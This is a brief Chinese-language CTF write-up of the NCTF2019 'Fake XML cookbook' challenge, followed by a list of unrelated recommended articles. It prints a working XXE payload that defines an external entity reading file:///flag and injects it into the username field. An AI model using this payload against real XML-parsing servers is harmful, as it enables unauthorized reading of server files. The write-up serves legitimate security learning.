[NCTF2019]Fake XML cookbook1

worker..2024-08-05 0:01

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码 
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
程序员小崔日记1 天前
一篇文章带你入门漏洞靶场:从 0 到 1 玩转 bWAPP(附完整安装教程)
xml·网络安全·漏洞学习·靶场搭建
xuhaoyu_cpp_java2 天前
XML学习
xml·java·笔记·学习
Riu_Peter4 天前
【技术】Maven 配置 settings.xml 轮询下载
xml·java·maven
それども4 天前
Mybatis xml 执行提示 NoSuchPropertyException
xml·mybatis
E_ICEBLUE4 天前
在 Python 中转换 XML 为 PDF 文档:基础转换与转换设置
xml·python·pdf
KevinCyao4 天前
批量发短信接口的数据格式设计:CSV、JSON还是XML?
xml·前端·前端框架·json
The Sheep 20235 天前
C# 操作XML
xml·前端·c#
华科易迅6 天前
Spring XML事务控制
xml·数据库·spring
C++ 老炮儿的技术栈6 天前
c++常见配置文件格式 JSON、INI、XML、YAML 它们如何解析
xml·开发语言·c++·windows·qt·json
华科易迅7 天前
Spring AOP(XML最终+环绕通知)
xml·java·spring
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程07UV安装并设置国内源08“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)09让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)